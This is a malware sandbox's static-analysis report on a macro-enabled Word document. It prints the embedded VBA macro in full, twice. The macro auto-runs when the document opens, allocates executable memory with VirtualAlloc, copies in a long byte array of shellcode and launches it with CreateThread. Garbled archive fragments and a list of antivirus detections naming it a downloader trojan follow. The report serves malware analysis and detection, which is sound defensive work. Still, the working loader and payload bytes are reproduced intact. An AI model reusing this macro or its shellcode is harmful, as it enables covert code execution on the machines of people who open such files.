popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ddkrnmylp As Long, ByVal Breeufju As Long, ByVal Oukbvdom As LongPtr, Lorgg As Long, ByVal Xmljn As Long, Gpvojff As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Yla As Long, ByVal Woai As Long, ByVal Valhkbcid As Long, ByVal Ydjx As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Arxsngtn As LongPtr, ByRef Wdwxnkb As Any, ByVal Wqii As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Ddkrnmylp As Long, ByVal Breeufju As Long, ByVal Oukbvdom As Long, Lorgg As Long, ByVal Xmljn As Long, Gpvojff As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Yla As Long, ByVal Woai As Long, ByVal Valhkbcid As Long, ByVal Ydjx As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Arxsngtn As Long, ByRef Wdwxnkb As Any, ByVal Wqii As Long) As Long
#End If

Sub Auto_Open()
        Dim Rap As Long, Voku As Variant, Nkgjwlvz As Long
#If VBA7 Then
        Dim Typ As LongPtr, Xil As LongPtr
#Else
        Dim Typ As Long, Xil As Long
#End If
        Voku = Array(217, 193, 217, 116, 36, 244, 94, 41, 201, 186, 192, 157, 66, 232, 177, 182, 49, 86, 24, 3, 86, 24, 131, 198, 196, 127, 183, 20, 44, 240, 56, 229, 172, 111, 8, 55, 37, 138, 14, 60, 103, 101, 68, 16, 139, 14, 8, 129, 156, 167, 231, 143, 41, 181, 223, 254, 210, 11, 224, 173, 16, 13, 156, 175, 68, 237, 157, 127, 153, 236, 218, 201, 212, 1, 182, 158, 157, 140, 39, 170, 227, _
12, 73, 124, 104, 44, 49, 249, 174, 217, 141, 0, 254, 169, 70, 27, 174, 38, 14, 59, 79, 234, 42, 242, 59, 48, 4, 250, 138, 195, 82, 143, 13, 2, 171, 79, 204, 101, 193, 227, 207, 190, 226, 27, 186, 180, 16, 161, 188, 14, 106, 125, 73, 145, 204, 246, 233, 117, 236, 219, 111, 253, 226, 144, 228, 89, 231, 39, 41, 210, 19, 163, 204, 53, 146, 247, 234, 145, 254, 172, 147, _
128, 90, 2, 172, 211, 3, 251, 8, 159, 166, 234, 44, 96, 57, 19, 113, 247, 168, 137, 253, 7, 93, 37, 148, 105, 244, 157, 14, 58, 113, 56, 201, 61, 168, 117, 14, 146, 0, 37, 227, 70, 79, 75, 3, 105, 143, 1, 108, 19, 230, 245, 30, 130, 215, 48, 240, 116, 8, 19, 91, 28, 38, 7, 12, 169, 197, 231, 156, 1, 10, 217, 16, 132, 122, 34, 112, 143, 19, 58, 70, _
27, 223, 226, 222, 85, 43, 202, 62, 219, 35, 124, 82, 190, 148, 25, 200, 11, 114, 150, 35, 185, 183, 97, 21, 242, 129, 173, 65, 191, 165, 249, 220, 115, 26, 34, 178, 226, 9, 71, 106, 178, 168, 228, 1, 83, 26, 203, 150, 195, 46, 100, 117, 113, 224, 75, 181, 65, 208, 155, 155, 129, 2, 236, 195, 178, 59, 106, 98, 71, 213, 93, 81, 148, 18, 140, 170, 236, 124, 149, 168, _
119, 82, 36, 0, 64, 130, 118, 78, 129, 238, 64, 188, 207, 58, 155, 192, 103, 121, 181, 185, 208, 130, 236, 106, 76, 23, 12, 223, 33, 143, 169, 222, 197, 79, 38, 137, 196, 79, 182, 102, 189, 55, 255, 63, 27, 171, 172, 253, 233, 110, 52, 55, 91, 53, 206, 101, 59, 193, 106, 186, 246, 78, 55, 203, 127, 193, 246, 117, 227, 175, 203, 26, 153, 123, 110, 134, 100, 245, 55, 88, _
161, 159, 171, 245, 156, 14, 13, 163, 47, 227, 58, 114, 32, 55, 242, 204, 186, 122, 145, 174, 99, 232, 28, 89, 213, 188, 132, 221, 187, 56, 64, 124, 6, 137, 226, 44, 239, 158, 78, 149, 169, 25, 8, 127, 2, 139, 187, 73, 57, 82, 139, 226, 246, 150, 98, 86, 79, 175, 199, 41, 28, 3, 144, 226, 199, 239, 86, 89, 37, 95, 194, 43, 67, 15, 174, 157, 195, 237, 90, 143, _
100, 158, 143, 36, 188, 1, 148, 211, 177, 206, 80, 16, 4, 91, 55, 101, 95, 194, 163, 225, 207, 205, 25, 200, 170, 21, 31, 79, 96, 52, 221, 231, 218, 224, 130, 165, 173, 105, 2, 100, 59, 185, 234, 28, 216, 237, 194, 214, 124, 57, 118, 32, 192, 19, 34, 2, 132, 170, 187, 203, 61, 128, 107, 217, 76, 108, 199, 90, 246, 164, 148, 3, 112, 130, 74, 159, 232, 53, 45, 41, _
142, 29, 213, 38, 22, 252, 87, 249, 244, 55, 48, 180, 162, 92, 181, 35, 83, 243, 93, 252, 218, 108, 91, 253, 8, 27, 162, 82, 219, 28, 25, 188, 159, 78, 14, 111, 247, 35, 230, 231, 28, 150, 40, 204, 29, 204, 163, 88, 232, 176, 163, 28, 223, 78, 52, 149, 192, 37, 48, 245, 106, 165, 110, 157, 31, 159, 16, 219, 31, 202, 126, 176, 140, 166, 214, 94, 30, 79, 207, 229, _
159, 154, 106, 217, 21, 49, 29, 81, 198, 57, 221, 9, 173, 201, 232, 41, 210, 255, 92, 220, 224, 232, 40, 30, 251, 232, 196, 94, 147, 232, 8, 94, 99, 129, 40, 94, 35, 81, 122, 54, 251, 245, 47, 35, 4, 32, 92, 248, 168, 66, 132, 169, 38, 85, 107, 85, 183, 6, 61, 61, 165, 62, 72, 95, 54, 235, 206, 95, 189, 219, 90, 88, 63, 39, 217, 166, 74, 66, 186, 229, _
234, 100, 80, 22, 235, 138, 150, 209, 38, 91, 232, 23, 127, 141, 62, 98, 81, 224, 8, 189, 173, 185, 133, 8, 15, 235, 15, 114, 3, 235, 5)

        Typ = VirtualAlloc(0, UBound(Voku), &H1000, &H40)
        For Nkgjwlvz = LBound(Voku) To UBound(Voku)
                Rap = Voku(Nkgjwlvz)
                Xil = RtlMoveMemory(Typ + Nkgjwlvz, Rap, 1)
        Next Nkgjwlvz
        Xil = CreateThread(0, 0, Typ, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ddkrnmylp As Long, ByVal Breeufju As Long, ByVal Oukbvdom As LongPtr, Lorgg As Long, ByVal Xmljn As Long, Gpvojff As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Yla As Long, ByVal Woai As Long, ByVal Valhkbcid As Long, ByVal Ydjx As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Arxsngtn As LongPtr, ByRef Wdwxnkb As Any, ByVal Wqii As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Ddkrnmylp As Long, ByVal Breeufju As Long, ByVal Oukbvdom As Long, Lorgg As Long, ByVal Xmljn As Long, Gpvojff As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Yla As Long, ByVal Woai As Long, ByVal Valhkbcid As Long, ByVal Ydjx As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Arxsngtn As Long, ByRef Wdwxnkb As Any, ByVal Wqii As Long) As Long
#End If

Sub Auto_Open()
        Dim Rap As Long, Voku As Variant, Nkgjwlvz As Long
#If VBA7 Then
        Dim Typ As LongPtr, Xil As LongPtr
#Else
        Dim Typ As Long, Xil As Long
#End If
        Voku = Array(217, 193, 217, 116, 36, 244, 94, 41, 201, 186, 192, 157, 66, 232, 177, 182, 49, 86, 24, 3, 86, 24, 131, 198, 196, 127, 183, 20, 44, 240, 56, 229, 172, 111, 8, 55, 37, 138, 14, 60, 103, 101, 68, 16, 139, 14, 8, 129, 156, 167, 231, 143, 41, 181, 223, 254, 210, 11, 224, 173, 16, 13, 156, 175, 68, 237, 157, 127, 153, 236, 218, 201, 212, 1, 182, 158, 157, 140, 39, 170, 227, _
12, 73, 124, 104, 44, 49, 249, 174, 217, 141, 0, 254, 169, 70, 27, 174, 38, 14, 59, 79, 234, 42, 242, 59, 48, 4, 250, 138, 195, 82, 143, 13, 2, 171, 79, 204, 101, 193, 227, 207, 190, 226, 27, 186, 180, 16, 161, 188, 14, 106, 125, 73, 145, 204, 246, 233, 117, 236, 219, 111, 253, 226, 144, 228, 89, 231, 39, 41, 210, 19, 163, 204, 53, 146, 247, 234, 145, 254, 172, 147, _
128, 90, 2, 172, 211, 3, 251, 8, 159, 166, 234, 44, 96, 57, 19, 113, 247, 168, 137, 253, 7, 93, 37, 148, 105, 244, 157, 14, 58, 113, 56, 201, 61, 168, 117, 14, 146, 0, 37, 227, 70, 79, 75, 3, 105, 143, 1, 108, 19, 230, 245, 30, 130, 215, 48, 240, 116, 8, 19, 91, 28, 38, 7, 12, 169, 197, 231, 156, 1, 10, 217, 16, 132, 122, 34, 112, 143, 19, 58, 70, _
27, 223, 226, 222, 85, 43, 202, 62, 219, 35, 124, 82, 190, 148, 25, 200, 11, 114, 150, 35, 185, 183, 97, 21, 242, 129, 173, 65, 191, 165, 249, 220, 115, 26, 34, 178, 226, 9, 71, 106, 178, 168, 228, 1, 83, 26, 203, 150, 195, 46, 100, 117, 113, 224, 75, 181, 65, 208, 155, 155, 129, 2, 236, 195, 178, 59, 106, 98, 71, 213, 93, 81, 148, 18, 140, 170, 236, 124, 149, 168, _
119, 82, 36, 0, 64, 130, 118, 78, 129, 238, 64, 188, 207, 58, 155, 192, 103, 121, 181, 185, 208, 130, 236, 106, 76, 23, 12, 223, 33, 143, 169, 222, 197, 79, 38, 137, 196, 79, 182, 102, 189, 55, 255, 63, 27, 171, 172, 253, 233, 110, 52, 55, 91, 53, 206, 101, 59, 193, 106, 186, 246, 78, 55, 203, 127, 193, 246, 117, 227, 175, 203, 26, 153, 123, 110, 134, 100, 245, 55, 88, _
161, 159, 171, 245, 156, 14, 13, 163, 47, 227, 58, 114, 32, 55, 242, 204, 186, 122, 145, 174, 99, 232, 28, 89, 213, 188, 132, 221, 187, 56, 64, 124, 6, 137, 226, 44, 239, 158, 78, 149, 169, 25, 8, 127, 2, 139, 187, 73, 57, 82, 139, 226, 246, 150, 98, 86, 79, 175, 199, 41, 28, 3, 144, 226, 199, 239, 86, 89, 37, 95, 194, 43, 67, 15, 174, 157, 195, 237, 90, 143, _
100, 158, 143, 36, 188, 1, 148, 211, 177, 206, 80, 16, 4, 91, 55, 101, 95, 194, 163, 225, 207, 205, 25, 200, 170, 21, 31, 79, 96, 52, 221, 231, 218, 224, 130, 165, 173, 105, 2, 100, 59, 185, 234, 28, 216, 237, 194, 214, 124, 57, 118, 32, 192, 19, 34, 2, 132, 170, 187, 203, 61, 128, 107, 217, 76, 108, 199, 90, 246, 164, 148, 3, 112, 130, 74, 159, 232, 53, 45, 41, _
142, 29, 213, 38, 22, 252, 87, 249, 244, 55, 48, 180, 162, 92, 181, 35, 83, 243, 93, 252, 218, 108, 91, 253, 8, 27, 162, 82, 219, 28, 25, 188, 159, 78, 14, 111, 247, 35, 230, 231, 28, 150, 40, 204, 29, 204, 163, 88, 232, 176, 163, 28, 223, 78, 52, 149, 192, 37, 48, 245, 106, 165, 110, 157, 31, 159, 16, 219, 31, 202, 126, 176, 140, 166, 214, 94, 30, 79, 207, 229, _
159, 154, 106, 217, 21, 49, 29, 81, 198, 57, 221, 9, 173, 201, 232, 41, 210, 255, 92, 220, 224, 232, 40, 30, 251, 232, 196, 94, 147, 232, 8, 94, 99, 129, 40, 94, 35, 81, 122, 54, 251, 245, 47, 35, 4, 32, 92, 248, 168, 66, 132, 169, 38, 85, 107, 85, 183, 6, 61, 61, 165, 62, 72, 95, 54, 235, 206, 95, 189, 219, 90, 88, 63, 39, 217, 166, 74, 66, 186, 229, _
234, 100, 80, 22, 235, 138, 150, 209, 38, 91, 232, 23, 127, 141, 62, 98, 81, 224, 8, 189, 173, 185, 133, 8, 15, 235, 15, 114, 3, 235, 5)

        Typ = VirtualAlloc(0, UBound(Voku), &H1000, &H40)
        For Nkgjwlvz = LBound(Voku) To UBound(Voku)
                Rap = Voku(Nkgjwlvz)
                Xil = RtlMoveMemory(Typ + Nkgjwlvz, Rap, 1)
        Next Nkgjwlvz
        Xil = CreateThread(0, 0, Typ, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub
[Content_Types].xml
L:Po0Cy
$SmDt_
_rels/.rels
word/document.xml
6[O8dpoxVh
KB'~,Z
BxTb/{
word/_rels/document.xml.rels
X=c+(\
word/vbaProject.bin
(D,B,F,A
s+8Ks7ZD
3jh[{0+
6^g^fJ8
U6VWaqoa
Q^`rxf
qgqe1
v_,Q^/vvF
Qez>Ji
>8%=y2
O-kgj
MqeZ)=
E|Om#E
IWhlMj
INfPdHr'y
]-G:F6
$z)N:Hc%;!
&;'G|"
fPh Cc%
TRi}Rk~
LUl8S.
a/?xyl Q
.vWU;B]
word/theme/theme1.xml
n!td[;
5}4Onb
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
N{QAacw-
word/settings.xml
]OT-/?m
word/styles.xml
"z:cE,
g/D{{Atz
Q)aaT2X
eR*Etnm{
#:e"o8*%
!*LjP%
Za?*Lj\
word/webSettings.xml
]?cv0$G
word/fontTable.xml
docProps/core.xml
#y) E5h
*cZ*xU
docProps/app.xml
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/vbaProject.binPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
DrWeb modification of W97M.Suspicious.1
Cynet Malicious (score: 70)
CMC Clean
CAT-QuickHeal O97M.Dropper.G
ALYac Clean
Malwarebytes Clean
VIPRE VB:Trojan.Valyria.6499
Sangfor Malware.Generic-Macro.Save.74e84d6e
K7AntiVirus Clean
BitDefender VB:Trojan.Valyria.6499
K7GW Clean
Arcabit VB:Trojan.Valyria.D1963
BitDefenderTheta Clean
VirIT Clean
Cyren PP97M/Agent.MD.gen!Eldorado
Symantec ISB.Downloader!gen178
ESET-NOD32 VBA/Kryptik.A
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
ClamAV Doc.Dropper.Valyria-6680543-0
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba Clean
NANO-Antivirus Trojan.Script.Agent.clxgqd
SUPERAntiSpyware Clean
MicroWorld-eScan VB:Trojan.Valyria.6499
Rising Macro.Agent.bw (CLASSIC)
Sophos Troj/DocDl-L
F-Secure Trojan:W97M/MaliciousMacro.GEN
Baidu VBA.Trojan.Kryptik.as
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition W97M/Downloader.cdh
FireEye VB:Trojan.Valyria.6499
Emsisoft VB:Trojan.Valyria.6499 (B)
Ikarus Clean
Avast-Mobile Clean
Jiangmin Clean
Avira HEUR/Macro.Downloader
MAX malware (ai score=88)
Antiy-AVL Trojan[Downloader]/MSOffice.Agent.ker
Gridinsoft Clean
Xcitium Clean
Microsoft TrojanDownloader:O97M/Donoff!sc
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
GData VB:Trojan.Valyria.6499
Google Detected
AhnLab-V3 Downloader/MSOffice.Generic.S1222
Acronis suspicious
McAfee W97M/Downloader.cdh
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Heur.Macro.Generic.c.c72287df
Yandex Clean
SentinelOne Static AI - Malicious OPENXML
MaxSecure Clean
Fortinet W32/Valyria.6654!tr
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.